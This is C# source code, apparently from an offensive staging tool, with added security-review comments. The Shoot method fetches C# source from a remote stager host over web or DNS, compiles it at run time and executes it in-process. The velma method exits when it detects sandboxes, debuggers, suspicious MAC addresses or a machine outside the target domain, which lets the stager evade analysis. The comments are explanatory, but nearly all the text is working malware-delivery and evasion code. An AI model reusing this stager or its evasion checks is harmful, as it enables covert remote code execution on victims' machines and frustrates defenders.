/// <summary>
/// Obtains C# source text from one of two staging helpers, compiles it at run time
/// with CodeDOM, and invokes a static method in the resulting assembly.
/// </summary>
/// <remarks>
/// Security review notes:
/// - The source string returned by AimWeb/AimDNS is passed straight to the compiler and
///   then executed. Nothing in this method validates or authenticates it, so whatever
///   <paramref name="stagerhost"/> serves runs in this process.
/// - GenerateInMemory = true does not make this diskless. CodeDOM's CSharpCodeProvider
///   drives the csc.exe command-line compiler and writes intermediate files to the
///   TempFiles directory (the original author's comment below confirms a .cs file is
///   written there). A csc.exe child process and short-lived files under
///   %LOCALAPPDATA%\Temp are therefore observable by endpoint monitoring.
/// - The compiled assembly is loaded into the current process and called via reflection.
/// </remarks>
/// <param name="refs">Assembly references added to the compiler parameters.</param>
/// <param name="EntryPoint">Type name looked up in the compiled assembly.</param>
/// <param name="Method">Method name looked up on that type; invoked as static with no arguments.</param>
/// <param name="technique">true selects AimWeb, false selects AimDNS.</param>
/// <param name="stagerhost">Passed unchanged to the selected staging helper.</param>
/// <exception cref="InvalidOperationException">Compilation reported errors; the message lists them.</exception>
private void Shoot(string[] refs, string EntryPoint, string Method, bool technique, string stagerhost)
{
    // NOTE(review): cp is constructed but never used in this method.
    CheckPlease cp = new CheckPlease();

    // Request the v3.5 compiler explicitly.
    Dictionary <string, string> compilerInfo = new Dictionary <string, string>();
    compilerInfo.Add("CompilerVersion", "v3.5");
    CSharpCodeProvider provider = new CSharpCodeProvider(compilerInfo);
    CompilerParameters parameters = new CompilerParameters();

    foreach (string r in refs)
    {
        parameters.ReferencedAssemblies.Add(r);
    }

    // Build a library (not an .exe) and load the result into this process.
    parameters.GenerateExecutable = false;
    parameters.GenerateInMemory = true;
    // /unsafe permits pointer code in the staged source; /platform:x86 targets 32-bit.
    parameters.CompilerOptions = "/unsafe /platform:x86";

    // Try and enforce the local appdata temp folder - .cs file written here so need to avoid c:\windows\temp for UAC enforced
    String tmp = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Temp");
    // Second argument (keepFiles) is false: intermediate files are deleted after compilation.
    parameters.TempFiles = new TempFileCollection(tmp, false);

    string code;

    // true = stage via web
    // false = stage via dns
    // AimWeb/AimDNS are defined outside this block; presumably each returns C# source text
    // (it is handed to CompileAssemblyFromSource below) - confirm against their definitions.
    if (technique)
    {
        code = AimWeb(stagerhost);
    }
    else
    {
        code = AimDNS(stagerhost);
    }

    CompilerResults results = provider.CompileAssemblyFromSource(parameters, code);

    if (results.Errors.HasErrors)
    {
        // Collect every entry in results.Errors into one message and fail.
        StringBuilder sb = new StringBuilder();

        foreach (CompilerError error in results.Errors)
        {
            sb.AppendLine(String.Format("Error ({0}): {1}", error.ErrorNumber, error.ErrorText));
        }

        throw new InvalidOperationException(sb.ToString());
    }

    // Resolve the requested type and method by name and call it as a static method
    // with no arguments. The lookups are used without null checks.
    Assembly assembly = results.CompiledAssembly;
    Type program = assembly.GetType(EntryPoint);
    MethodInfo main = program.GetMethod(Method);
    main.Invoke(null, null);
}
/// <summary>
/// Runs one environment check selected by <paramref name="check"/> and terminates the
/// process with exit code 1 when that check's condition is met.
/// </summary>
/// <remarks>
/// Security review notes: this is an execution gate. Depending on the selected check the
/// process exits before doing anything else, which means dynamic analysis in an
/// environment that trips a check will observe only an immediate exit with code 1.
/// The CheckPlease methods are defined outside this block; the per-case descriptions
/// below are inferred from their names and should be confirmed against that class.
/// A value of <paramref name="check"/> outside 0-4 matches no case and the method returns
/// without doing anything.
/// </remarks>
/// <param name="check">Selector for the check to run (0-4).</param>
/// <param name="arg">Only used by check 0, where it is passed to CheckPlease.isDomain.</param>
public void velma(int check, string arg)
{
    CheckPlease cp = new CheckPlease();

    switch (check)
    {
        case 0:
            // Exit unless isDomain(arg) is true (presumably: host belongs to the named domain).
            if (!cp.isDomain(arg))
            {
                Environment.Exit(1);
            }
            break;
        case 1:
            // Exit unless isDomainJoined() is true (presumably: host is joined to any domain).
            if (!cp.isDomainJoined())
            {
                Environment.Exit(1);
            }
            break;
        case 2:
            // Exit if containsSandboxArtifacts() is true.
            if (cp.containsSandboxArtifacts())
            {
                Environment.Exit(1);
            }
            break;
        case 3:
            // Exit if isBadMac() is true (presumably a MAC-address based check - confirm).
            if (cp.isBadMac())
            {
                Environment.Exit(1);
            }
            break;
        case 4:
            // Exit if isDebugged() is true.
            if (cp.isDebugged())
            {
                Environment.Exit(1);
            }
            break;
    }
}